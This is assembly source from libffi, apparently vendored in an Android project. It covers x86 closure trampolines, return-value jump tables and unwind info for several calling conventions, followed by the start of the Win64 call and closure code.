/* The closure entry points are reached from the ffi_closure trampoline.
On entry, %eax contains the address of the ffi_closure. */
.balign 16
.globl C(ffi_closure_i386)
FFI_HIDDEN(C(ffi_closure_i386))
C(ffi_closure_i386):
L(UW12):
# cfi_startproc
subl $closure_FS, %esp
L(UW13):
# cfi_def_cfa_offset(closure_FS + 4)
FFI_CLOSURE_SAVE_REGS
FFI_CLOSURE_COPY_TRAMP_DATA
/* Entry point from preceeding Go closures. */
L(do_closure_i386):
FFI_CLOSURE_PREP_CALL
FFI_CLOSURE_CALL_INNER(14)
FFI_CLOSURE_MASK_AND_JUMP(2, 15)
.balign 8
L(load_table2):
E(L(load_table2), X86_RET_FLOAT)
flds closure_CF(%esp)
jmp L(e2)
E(L(load_table2), X86_RET_DOUBLE)
fldl closure_CF(%esp)
jmp L(e2)
E(L(load_table2), X86_RET_LDOUBLE)
fldt closure_CF(%esp)
jmp L(e2)
E(L(load_table2), X86_RET_SINT8)
movsbl %al, %eax
jmp L(e2)
E(L(load_table2), X86_RET_SINT16)
movswl %ax, %eax
jmp L(e2)
E(L(load_table2), X86_RET_UINT8)
movzbl %al, %eax
jmp L(e2)
E(L(load_table2), X86_RET_UINT16)
movzwl %ax, %eax
jmp L(e2)
E(L(load_table2), X86_RET_INT64)
movl closure_CF+4(%esp), %edx
jmp L(e2)
E(L(load_table2), X86_RET_INT32)
nop
/* fallthru */
E(L(load_table2), X86_RET_VOID)
L(e2):
addl $closure_FS, %esp
L(UW16):
# cfi_adjust_cfa_offset(-closure_FS)
ret
L(UW17):
# cfi_adjust_cfa_offset(closure_FS)
E(L(load_table2), X86_RET_STRUCTPOP)
addl $closure_FS, %esp
L(UW18):
# cfi_adjust_cfa_offset(-closure_FS)
ret $4
L(UW19):
# cfi_adjust_cfa_offset(closure_FS)
E(L(load_table2), X86_RET_STRUCTARG)
jmp L(e2)
E(L(load_table2), X86_RET_STRUCT_1B)
movzbl %al, %eax
jmp L(e2)
E(L(load_table2), X86_RET_STRUCT_2B)
movzwl %ax, %eax
jmp L(e2)
/* Fill out the table so that bad values are predictable. */
E(L(load_table2), X86_RET_UNUSED14)
ud2
E(L(load_table2), X86_RET_UNUSED15)
ud2
L(UW20):
# cfi_endproc
ENDF(C(ffi_closure_i386))
.balign 16
.globl C(ffi_go_closure_STDCALL)
FFI_HIDDEN(C(ffi_go_closure_STDCALL))
C(ffi_go_closure_STDCALL):
L(UW21):
# cfi_startproc
subl $closure_FS, %esp
L(UW22):
# cfi_def_cfa_offset(closure_FS + 4)
FFI_CLOSURE_SAVE_REGS
movl 4(%ecx), %edx /* copy cif */
movl 8(%ecx), %eax /* copy fun */
movl %edx, closure_CF+28(%esp)
movl %eax, closure_CF+32(%esp)
movl %ecx, closure_CF+36(%esp) /* closure is user_data */
jmp L(do_closure_STDCALL)
L(UW23):
# cfi_endproc
ENDF(C(ffi_go_closure_STDCALL))
/* For REGISTER, we have no available parameter registers, and so we
enter here having pushed the closure onto the stack. */
.balign 16
.globl C(ffi_closure_REGISTER)
FFI_HIDDEN(C(ffi_closure_REGISTER))
C(ffi_closure_REGISTER):
L(UW24):
# cfi_startproc
# cfi_def_cfa(%esp, 8)
# cfi_offset(%eip, -8)
subl $closure_FS-4, %esp
L(UW25):
# cfi_def_cfa_offset(closure_FS + 4)
FFI_CLOSURE_SAVE_REGS
movl closure_FS-4(%esp), %ecx /* load retaddr */
movl closure_FS(%esp), %eax /* load closure */
movl %ecx, closure_FS(%esp) /* move retaddr */
jmp L(do_closure_REGISTER)
L(UW26):
# cfi_endproc
ENDF(C(ffi_closure_REGISTER))
/* For STDCALL (and others), we need to pop N bytes of arguments off
the stack following the closure. The amount needing to be popped
is returned to us from ffi_closure_inner. */
.balign 16
.globl C(ffi_closure_STDCALL)
FFI_HIDDEN(C(ffi_closure_STDCALL))
C(ffi_closure_STDCALL):
L(UW27):
# cfi_startproc
subl $closure_FS, %esp
L(UW28):
# cfi_def_cfa_offset(closure_FS + 4)
FFI_CLOSURE_SAVE_REGS
/* Entry point from ffi_closure_REGISTER. */
L(do_closure_REGISTER):
FFI_CLOSURE_COPY_TRAMP_DATA
/* Entry point from preceeding Go closure. */
L(do_closure_STDCALL):
FFI_CLOSURE_PREP_CALL
FFI_CLOSURE_CALL_INNER(29)
movl %eax, %ecx
shrl $X86_RET_POP_SHIFT, %ecx /* isolate pop count */
leal closure_FS(%esp, %ecx), %ecx /* compute popped esp */
movl closure_FS(%esp), %edx /* move return address */
movl %edx, (%ecx)
/* From this point on, the value of %esp upon return is %ecx+4,
and we've copied the return address to %ecx to make return easy.
There's no point in representing this in the unwind info, as
there is always a window between the mov and the ret which
will be wrong from one point of view or another. */
FFI_CLOSURE_MASK_AND_JUMP(3, 30)
.balign 8
L(load_table3):
E(L(load_table3), X86_RET_FLOAT)
flds closure_CF(%esp)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_DOUBLE)
fldl closure_CF(%esp)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_LDOUBLE)
fldt closure_CF(%esp)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_SINT8)
movsbl %al, %eax
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_SINT16)
movswl %ax, %eax
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_UINT8)
movzbl %al, %eax
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_UINT16)
movzwl %ax, %eax
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_INT64)
movl closure_CF+4(%esp), %edx
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_INT32)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_VOID)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_STRUCTPOP)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_STRUCTARG)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_STRUCT_1B)
movzbl %al, %eax
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_STRUCT_2B)
movzwl %ax, %eax
movl %ecx, %esp
ret
/* Fill out the table so that bad values are predictable. */
E(L(load_table3), X86_RET_UNUSED14)
ud2
E(L(load_table3), X86_RET_UNUSED15)
ud2
L(UW31):
# cfi_endproc
ENDF(C(ffi_closure_STDCALL))
#if !FFI_NO_RAW_API
#define raw_closure_S_FS (16+16+12)
.balign 16
.globl C(ffi_closure_raw_SYSV)
FFI_HIDDEN(C(ffi_closure_raw_SYSV))
C(ffi_closure_raw_SYSV):
L(UW32):
# cfi_startproc
subl $raw_closure_S_FS, %esp
L(UW33):
# cfi_def_cfa_offset(raw_closure_S_FS + 4)
movl %ebx, raw_closure_S_FS-4(%esp)
L(UW34):
# cfi_rel_offset(%ebx, raw_closure_S_FS-4)
movl FFI_TRAMPOLINE_SIZE+8(%eax), %edx /* load cl->user_data */
movl %edx, 12(%esp)
leal raw_closure_S_FS+4(%esp), %edx /* load raw_args */
movl %edx, 8(%esp)
leal 16(%esp), %edx /* load &res */
movl %edx, 4(%esp)
movl FFI_TRAMPOLINE_SIZE(%eax), %ebx /* load cl->cif */
movl %ebx, (%esp)
call *FFI_TRAMPOLINE_SIZE+4(%eax) /* call cl->fun */
movl 20(%ebx), %eax /* load cif->flags */
andl $X86_RET_TYPE_MASK, %eax
#ifdef __PIC__
call C(__x86.get_pc_thunk.bx)
L(pc4):
leal L(load_table4)-L(pc4)(%ebx, %eax, 8), %ecx
#else
leal L(load_table4)(,%eax, 8), %ecx
#endif
movl raw_closure_S_FS-4(%esp), %ebx
L(UW35):
# cfi_restore(%ebx)
movl 16(%esp), %eax /* Optimistic load */
jmp *%ecx
.balign 8
L(load_table4):
E(L(load_table4), X86_RET_FLOAT)
flds 16(%esp)
jmp L(e4)
E(L(load_table4), X86_RET_DOUBLE)
fldl 16(%esp)
jmp L(e4)
E(L(load_table4), X86_RET_LDOUBLE)
fldt 16(%esp)
jmp L(e4)
E(L(load_table4), X86_RET_SINT8)
movsbl %al, %eax
jmp L(e4)
E(L(load_table4), X86_RET_SINT16)
movswl %ax, %eax
jmp L(e4)
E(L(load_table4), X86_RET_UINT8)
movzbl %al, %eax
jmp L(e4)
E(L(load_table4), X86_RET_UINT16)
movzwl %ax, %eax
jmp L(e4)
E(L(load_table4), X86_RET_INT64)
movl 16+4(%esp), %edx
jmp L(e4)
E(L(load_table4), X86_RET_INT32)
nop
/* fallthru */
E(L(load_table4), X86_RET_VOID)
L(e4):
addl $raw_closure_S_FS, %esp
L(UW36):
# cfi_adjust_cfa_offset(-raw_closure_S_FS)
ret
L(UW37):
# cfi_adjust_cfa_offset(raw_closure_S_FS)
E(L(load_table4), X86_RET_STRUCTPOP)
addl $raw_closure_S_FS, %esp
L(UW38):
# cfi_adjust_cfa_offset(-raw_closure_S_FS)
ret $4
L(UW39):
# cfi_adjust_cfa_offset(raw_closure_S_FS)
E(L(load_table4), X86_RET_STRUCTARG)
jmp L(e4)
E(L(load_table4), X86_RET_STRUCT_1B)
movzbl %al, %eax
jmp L(e4)
E(L(load_table4), X86_RET_STRUCT_2B)
movzwl %ax, %eax
jmp L(e4)
/* Fill out the table so that bad values are predictable. */
E(L(load_table4), X86_RET_UNUSED14)
ud2
E(L(load_table4), X86_RET_UNUSED15)
ud2
L(UW40):
# cfi_endproc
ENDF(C(ffi_closure_raw_SYSV))
#define raw_closure_T_FS (16+16+8)
.balign 16
.globl C(ffi_closure_raw_THISCALL)
FFI_HIDDEN(C(ffi_closure_raw_THISCALL))
C(ffi_closure_raw_THISCALL):
L(UW41):
# cfi_startproc
/* Rearrange the stack such that %ecx is the first argument.
This means moving the return address. */
popl %edx
L(UW42):
# cfi_def_cfa_offset(0)
# cfi_register(%eip, %edx)
pushl %ecx
L(UW43):
# cfi_adjust_cfa_offset(4)
pushl %edx
L(UW44):
# cfi_adjust_cfa_offset(4)
# cfi_rel_offset(%eip, 0)
subl $raw_closure_T_FS, %esp
L(UW45):
# cfi_adjust_cfa_offset(raw_closure_T_FS)
movl %ebx, raw_closure_T_FS-4(%esp)
L(UW46):
# cfi_rel_offset(%ebx, raw_closure_T_FS-4)
movl FFI_TRAMPOLINE_SIZE+8(%eax), %edx /* load cl->user_data */
movl %edx, 12(%esp)
leal raw_closure_T_FS+4(%esp), %edx /* load raw_args */
movl %edx, 8(%esp)
leal 16(%esp), %edx /* load &res */
movl %edx, 4(%esp)
movl FFI_TRAMPOLINE_SIZE(%eax), %ebx /* load cl->cif */
movl %ebx, (%esp)
call *FFI_TRAMPOLINE_SIZE+4(%eax) /* call cl->fun */
movl 20(%ebx), %eax /* load cif->flags */
andl $X86_RET_TYPE_MASK, %eax
#ifdef __PIC__
call C(__x86.get_pc_thunk.bx)
L(pc5):
leal L(load_table5)-L(pc5)(%ebx, %eax, 8), %ecx
#else
leal L(load_table5)(,%eax, 8), %ecx
#endif
movl raw_closure_T_FS-4(%esp), %ebx
L(UW47):
# cfi_restore(%ebx)
movl 16(%esp), %eax /* Optimistic load */
jmp *%ecx
.balign 8
L(load_table5):
E(L(load_table5), X86_RET_FLOAT)
flds 16(%esp)
jmp L(e5)
E(L(load_table5), X86_RET_DOUBLE)
fldl 16(%esp)
jmp L(e5)
E(L(load_table5), X86_RET_LDOUBLE)
fldt 16(%esp)
jmp L(e5)
E(L(load_table5), X86_RET_SINT8)
movsbl %al, %eax
jmp L(e5)
E(L(load_table5), X86_RET_SINT16)
movswl %ax, %eax
jmp L(e5)
E(L(load_table5), X86_RET_UINT8)
movzbl %al, %eax
jmp L(e5)
E(L(load_table5), X86_RET_UINT16)
movzwl %ax, %eax
jmp L(e5)
E(L(load_table5), X86_RET_INT64)
movl 16+4(%esp), %edx
jmp L(e5)
E(L(load_table5), X86_RET_INT32)
nop
/* fallthru */
E(L(load_table5), X86_RET_VOID)
L(e5):
addl $raw_closure_T_FS, %esp
L(UW48):
# cfi_adjust_cfa_offset(-raw_closure_T_FS)
/* Remove the extra %ecx argument we pushed. */
ret $4
L(UW49):
# cfi_adjust_cfa_offset(raw_closure_T_FS)
E(L(load_table5), X86_RET_STRUCTPOP)
addl $raw_closure_T_FS, %esp
L(UW50):
# cfi_adjust_cfa_offset(-raw_closure_T_FS)
ret $8
L(UW51):
# cfi_adjust_cfa_offset(raw_closure_T_FS)
E(L(load_table5), X86_RET_STRUCTARG)
jmp L(e5)
E(L(load_table5), X86_RET_STRUCT_1B)
movzbl %al, %eax
jmp L(e5)
E(L(load_table5), X86_RET_STRUCT_2B)
movzwl %ax, %eax
jmp L(e5)
/* Fill out the table so that bad values are predictable. */
E(L(load_table5), X86_RET_UNUSED14)
ud2
E(L(load_table5), X86_RET_UNUSED15)
ud2
L(UW52):
# cfi_endproc
ENDF(C(ffi_closure_raw_THISCALL))
#endif /* !FFI_NO_RAW_API */
#ifdef X86_DARWIN
# define COMDAT(X) \
.section __TEXT,__text,coalesced,pure_instructions; \
.weak_definition X; \
FFI_HIDDEN(X)
#elif defined __ELF__ && !(defined(__sun__) && defined(__svr4__))
# define COMDAT(X) \
.section .text.X,"axG",@progbits,X,comdat; \
.globl X; \
FFI_HIDDEN(X)
#else
# define COMDAT(X)
#endif
#if defined(__PIC__)
COMDAT(C(__x86.get_pc_thunk.bx))
C(__x86.get_pc_thunk.bx):
movl (%esp), %ebx
ret
ENDF(C(__x86.get_pc_thunk.bx))
# if defined X86_DARWIN || defined HAVE_HIDDEN_VISIBILITY_ATTRIBUTE
COMDAT(C(__x86.get_pc_thunk.dx))
C(__x86.get_pc_thunk.dx):
movl (%esp), %edx
ret
ENDF(C(__x86.get_pc_thunk.dx))
#endif /* DARWIN || HIDDEN */
#endif /* __PIC__ */
/* Sadly, OSX cctools-as doesn't understand .cfi directives at all. */
#ifdef __APPLE__
.section __TEXT,__eh_frame,coalesced,no_toc+strip_static_syms+live_support
EHFrame0:
#elif defined(X86_WIN32)
.section .eh_frame,"r"
#elif defined(HAVE_AS_X86_64_UNWIND_SECTION_TYPE)
.section .eh_frame,EH_FRAME_FLAGS,@unwind
#else
.section .eh_frame,EH_FRAME_FLAGS,@progbits
#endif
#ifdef HAVE_AS_X86_PCREL
# define PCREL(X) X - .
#else
# define PCREL(X) X@rel
#endif
/* Simplify advancing between labels. Assume DW_CFA_advance_loc1 fits. */
#define ADV(N, P) .byte 2, L(N)-L(P)
.balign 4
L(CIE):
.set L(set0),L(ECIE)-L(SCIE)
.long L(set0) /* CIE Length */
L(SCIE):
.long 0 /* CIE Identifier Tag */
.byte 1 /* CIE Version */
.ascii "zR\0" /* CIE Augmentation */
.byte 1 /* CIE Code Alignment Factor */
.byte 0x7c /* CIE Data Alignment Factor */
.byte 0x8 /* CIE RA Column */
.byte 1 /* Augmentation size */
.byte 0x1b /* FDE Encoding (pcrel sdata4) */
.byte 0xc, 4, 4 /* DW_CFA_def_cfa, %esp offset 4 */
.byte 0x80+8, 1 /* DW_CFA_offset, %eip offset 1*-4 */
.balign 4
L(ECIE):
.set L(set1),L(EFDE1)-L(SFDE1)
.long L(set1) /* FDE Length */
L(SFDE1):
.long L(SFDE1)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW0)) /* Initial location */
.long L(UW5)-L(UW0) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW1, UW0)
.byte 0xc, 5, 8 /* DW_CFA_def_cfa, %ebp 8 */
.byte 0x80+5, 2 /* DW_CFA_offset, %ebp 2*-4 */
ADV(UW2, UW1)
.byte 0x80+3, 0 /* DW_CFA_offset, %ebx 0*-4 */
ADV(UW3, UW2)
.byte 0xa /* DW_CFA_remember_state */
.byte 0xc, 4, 4 /* DW_CFA_def_cfa, %esp 4 */
.byte 0xc0+3 /* DW_CFA_restore, %ebx */
.byte 0xc0+5 /* DW_CFA_restore, %ebp */
ADV(UW4, UW3)
.byte 0xb /* DW_CFA_restore_state */
.balign 4
L(EFDE1):
.set L(set2),L(EFDE2)-L(SFDE2)
.long L(set2) /* FDE Length */
L(SFDE2):
.long L(SFDE2)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW6)) /* Initial location */
.long L(UW8)-L(UW6) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW7, UW6)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE2):
.set L(set3),L(EFDE3)-L(SFDE3)
.long L(set3) /* FDE Length */
L(SFDE3):
.long L(SFDE3)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW9)) /* Initial location */
.long L(UW11)-L(UW9) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW10, UW9)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE3):
.set L(set4),L(EFDE4)-L(SFDE4)
.long L(set4) /* FDE Length */
L(SFDE4):
.long L(SFDE4)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW12)) /* Initial location */
.long L(UW20)-L(UW12) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW13, UW12)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
#ifdef FFI_CLOSURE_CALL_INNER_SAVE_EBX
ADV(UW14, UW13)
.byte 0x80+3, (40-(closure_FS+4))/-4 /* DW_CFA_offset %ebx */
ADV(UW15, UW14)
.byte 0xc0+3 /* DW_CFA_restore %ebx */
ADV(UW16, UW15)
#else
ADV(UW16, UW13)
#endif
.byte 0xe, 4 /* DW_CFA_def_cfa_offset */
ADV(UW17, UW16)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
ADV(UW18, UW17)
.byte 0xe, 4 /* DW_CFA_def_cfa_offset */
ADV(UW19, UW18)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE4):
.set L(set5),L(EFDE5)-L(SFDE5)
.long L(set5) /* FDE Length */
L(SFDE5):
.long L(SFDE5)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW21)) /* Initial location */
.long L(UW23)-L(UW21) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW22, UW21)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE5):
.set L(set6),L(EFDE6)-L(SFDE6)
.long L(set6) /* FDE Length */
L(SFDE6):
.long L(SFDE6)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW24)) /* Initial location */
.long L(UW26)-L(UW24) /* Address range */
.byte 0 /* Augmentation size */
.byte 0xe, 8 /* DW_CFA_def_cfa_offset */
.byte 0x80+8, 2 /* DW_CFA_offset %eip, 2*-4 */
ADV(UW25, UW24)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE6):
.set L(set7),L(EFDE7)-L(SFDE7)
.long L(set7) /* FDE Length */
L(SFDE7):
.long L(SFDE7)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW27)) /* Initial location */
.long L(UW31)-L(UW27) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW28, UW27)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
#ifdef FFI_CLOSURE_CALL_INNER_SAVE_EBX
ADV(UW29, UW28)
.byte 0x80+3, (40-(closure_FS+4))/-4 /* DW_CFA_offset %ebx */
ADV(UW30, UW29)
.byte 0xc0+3 /* DW_CFA_restore %ebx */
#endif
.balign 4
L(EFDE7):
#if !FFI_NO_RAW_API
.set L(set8),L(EFDE8)-L(SFDE8)
.long L(set8) /* FDE Length */
L(SFDE8):
.long L(SFDE8)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW32)) /* Initial location */
.long L(UW40)-L(UW32) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW33, UW32)
.byte 0xe, raw_closure_S_FS+4 /* DW_CFA_def_cfa_offset */
ADV(UW34, UW33)
.byte 0x80+3, 2 /* DW_CFA_offset %ebx 2*-4 */
ADV(UW35, UW34)
.byte 0xc0+3 /* DW_CFA_restore %ebx */
ADV(UW36, UW35)
.byte 0xe, 4 /* DW_CFA_def_cfa_offset */
ADV(UW37, UW36)
.byte 0xe, raw_closure_S_FS+4 /* DW_CFA_def_cfa_offset */
ADV(UW38, UW37)
.byte 0xe, 4 /* DW_CFA_def_cfa_offset */
ADV(UW39, UW38)
.byte 0xe, raw_closure_S_FS+4 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE8):
.set L(set9),L(EFDE9)-L(SFDE9)
.long L(set9) /* FDE Length */
L(SFDE9):
.long L(SFDE9)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW41)) /* Initial location */
.long L(UW52)-L(UW41) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW42, UW41)
.byte 0xe, 0 /* DW_CFA_def_cfa_offset */
.byte 0x9, 8, 2 /* DW_CFA_register %eip, %edx */
ADV(UW43, UW42)
.byte 0xe, 4 /* DW_CFA_def_cfa_offset */
ADV(UW44, UW43)
.byte 0xe, 8 /* DW_CFA_def_cfa_offset */
.byte 0x80+8, 2 /* DW_CFA_offset %eip 2*-4 */
ADV(UW45, UW44)
.byte 0xe, raw_closure_T_FS+8 /* DW_CFA_def_cfa_offset */
ADV(UW46, UW45)
.byte 0x80+3, 3 /* DW_CFA_offset %ebx 3*-4 */
ADV(UW47, UW46)
.byte 0xc0+3 /* DW_CFA_restore %ebx */
ADV(UW48, UW47)
.byte 0xe, 8 /* DW_CFA_def_cfa_offset */
ADV(UW49, UW48)
.byte 0xe, raw_closure_T_FS+8 /* DW_CFA_def_cfa_offset */
ADV(UW50, UW49)
.byte 0xe, 8 /* DW_CFA_def_cfa_offset */
ADV(UW51, UW50)
.byte 0xe, raw_closure_T_FS+8 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE9):
#endif /* !FFI_NO_RAW_API */
#ifdef _WIN32
.def @feat.00;
.scl 3;
.type 0;
.endef
.globl @feat.00
@feat.00 = 1
#endif
#ifdef __APPLE__
.subsections_via_symbols
.section __LD,__compact_unwind,regular,debug
/* compact unwind for ffi_call_i386 */
.long C(ffi_call_i386)
.set L1,L(UW5)-L(UW0)
.long L1
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_go_closure_EAX */
.long C(ffi_go_closure_EAX)
.set L2,L(UW8)-L(UW6)
.long L2
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_go_closure_ECX */
.long C(ffi_go_closure_ECX)
.set L3,L(UW11)-L(UW9)
.long L3
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_closure_i386 */
.long C(ffi_closure_i386)
.set L4,L(UW20)-L(UW12)
.long L4
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_go_closure_STDCALL */
.long C(ffi_go_closure_STDCALL)
.set L5,L(UW23)-L(UW21)
.long L5
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_closure_REGISTER */
.long C(ffi_closure_REGISTER)
.set L6,L(UW26)-L(UW24)
.long L6
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_closure_STDCALL */
.long C(ffi_closure_STDCALL)
.set L7,L(UW31)-L(UW27)
.long L7
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_closure_raw_SYSV */
.long C(ffi_closure_raw_SYSV)
.set L8,L(UW40)-L(UW32)
.long L8
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_closure_raw_THISCALL */
.long C(ffi_closure_raw_THISCALL)
.set L9,L(UW52)-L(UW41)
.long L9
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
#endif /* __APPLE__ */
#endif /* ifndef _MSC_VER */
#endif /* ifndef __x86_64__ */
#if defined __ELF__ && defined __linux__
.section .note.GNU-stack,"",@progbits
#endif
#endif
|
aimardcr/APKKiller
| 5,142
|
app/src/main/cpp/whale/src/libffi/x86/win64_x86_64.S
|
#ifdef __x86_64__
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#include <ffi_cfi.h>
#include "asmnames.h"
#if defined(HAVE_AS_CFI_PSEUDO_OP)
.cfi_sections .debug_frame
#endif
#ifdef X86_WIN64
#define SEH(...) __VA_ARGS__
#define arg0 %rcx
#define arg1 %rdx
#define arg2 %r8
#define arg3 %r9
#else
#define SEH(...)
#define arg0 %rdi
#define arg1 %rsi
#define arg2 %rdx
#define arg3 %rcx
#endif
/* This macro allows the safe creation of jump tables without an
actual table. The entry points into the table are all 8 bytes.
The use of ORG asserts that we're at the correct location. */
/* ??? The clang assembler doesn't handle .org with symbolic expressions. */
#if defined(__clang__) || defined(__APPLE__) || (defined (__sun__) && defined(__svr4__))
# define E(BASE, X) .balign 8
#else
# define E(BASE, X) .balign 8; .org BASE + X * 8
#endif
.text
/* ffi_call_win64 (void *stack, struct win64_call_frame *frame, void *r10)
Bit o trickiness here -- FRAME is the base of the stack frame
for this function. This has been allocated by ffi_call. We also
deallocate some of the stack that has been alloca'd. */
.align 8
.globl C(ffi_call_win64)
SEH(.seh_proc ffi_call_win64)
C(ffi_call_win64):
cfi_startproc
/* Set up the local stack frame and install it in rbp/rsp. */
movq (%rsp), %rax
movq %rbp, (arg1)
movq %rax, 8(arg1)
movq arg1, %rbp
cfi_def_cfa(%rbp, 16)
cfi_rel_offset(%rbp, 0)
SEH(.seh_pushreg %rbp)
SEH(.seh_setframe %rbp, 0)
SEH(.seh_endprologue)
movq arg0, %rsp
movq arg2, %r10
/* Load all slots into both general and xmm registers. */
movq (%rsp), %rcx
movsd (%rsp), %xmm0
movq 8(%rsp), %rdx
movsd 8(%rsp), %xmm1
movq 16(%rsp), %r8
movsd 16(%rsp), %xmm2
movq 24(%rsp), %r9
movsd 24(%rsp), %xmm3
call *16(%rbp)
movl 24(%rbp), %ecx
movq 32(%rbp), %r8
leaq 0f(%rip), %r10
cmpl $FFI_TYPE_SMALL_STRUCT_4B, %ecx
leaq (%r10, %rcx, 8), %r10
ja 99f
jmp *%r10
/* Below, we're space constrained most of the time. Thus we eschew the
modern "mov, pop, ret" sequence (5 bytes) for "leave, ret" (2 bytes). */
.macro epilogue
leaveq
cfi_remember_state
cfi_def_cfa(%rsp, 8)
cfi_restore(%rbp)
ret
cfi_restore_state
.endm
.align 8
0:
E(0b, FFI_TYPE_VOID)
epilogue
E(0b, FFI_TYPE_INT)
movslq %eax, %rax
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_FLOAT)
movss %xmm0, (%r8)
epilogue
E(0b, FFI_TYPE_DOUBLE)
movsd %xmm0, (%r8)
epilogue
E(0b, FFI_TYPE_LONGDOUBLE)
call PLT(C(abort))
E(0b, FFI_TYPE_UINT8)
movzbl %al, %eax
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_SINT8)
movsbq %al, %rax
jmp 98f
E(0b, FFI_TYPE_UINT16)
movzwl %ax, %eax
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_SINT16)
movswq %ax, %rax
jmp 98f
E(0b, FFI_TYPE_UINT32)
movl %eax, %eax
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_SINT32)
movslq %eax, %rax
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_UINT64)
98: movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_SINT64)
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_STRUCT)
epilogue
E(0b, FFI_TYPE_POINTER)
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_COMPLEX)
call PLT(C(abort))
E(0b, FFI_TYPE_SMALL_STRUCT_1B)
movb %al, (%r8)
epilogue
E(0b, FFI_TYPE_SMALL_STRUCT_2B)
movw %ax, (%r8)
epilogue
E(0b, FFI_TYPE_SMALL_STRUCT_4B)
movl %eax, (%r8)
epilogue
.align 8
99: call PLT(C(abort))
epilogue
cfi_endproc
SEH(.seh_endproc)
/* 32 bytes of outgoing register stack space, 8 bytes of alignment,
16 bytes of result, 32 bytes of xmm registers. */
#define ffi_clo_FS (32+8+16+32)
#define ffi_clo_OFF_R (32+8)
#define ffi_clo_OFF_X (32+8+16)
.align 8
.globl C(ffi_go_closure_win64)
SEH(.seh_proc ffi_go_closure_win64)
C(ffi_go_closure_win64):
cfi_startproc
/* Save all integer arguments into the incoming reg stack space. */
movq %rcx, 8(%rsp)
movq %rdx, 16(%rsp)
movq %r8, 24(%rsp)
movq %r9, 32(%rsp)
movq 8(%r10), %rcx /* load cif */
movq 16(%r10), %rdx /* load fun */
movq %r10, %r8 /* closure is user_data */
jmp 0f
cfi_endproc
SEH(.seh_endproc)
.align 8
.globl C(ffi_closure_win64)
SEH(.seh_proc ffi_closure_win64)
C(ffi_closure_win64):
cfi_startproc
/* Save all integer arguments into the incoming reg stack space. */
movq %rcx, 8(%rsp)
movq %rdx, 16(%rsp)
movq %r8, 24(%rsp)
movq %r9, 32(%rsp)
movq FFI_TRAMPOLINE_SIZE(%r10), %rcx /* load cif */
movq FFI_TRAMPOLINE_SIZE+8(%r10), %rdx /* load fun */
movq FFI_TRAMPOLINE_SIZE+16(%r10), %r8 /* load user_data */
0:
subq $ffi_clo_FS, %rsp
cfi_adjust_cfa_offset(ffi_clo_FS)
SEH(.seh_stackalloc ffi_clo_FS)
SEH(.seh_endprologue)
/* Save all sse arguments into the stack frame. */
movsd %xmm0, ffi_clo_OFF_X(%rsp)
movsd %xmm1, ffi_clo_OFF_X+8(%rsp)
movsd %xmm2, ffi_clo_OFF_X+16(%rsp)
movsd %xmm3, ffi_clo_OFF_X+24(%rsp)
leaq ffi_clo_OFF_R(%rsp), %r9
call PLT(C(ffi_closure_win64_inner))
/* Load the result into both possible result registers. */
movq ffi_clo_OFF_R(%rsp), %rax
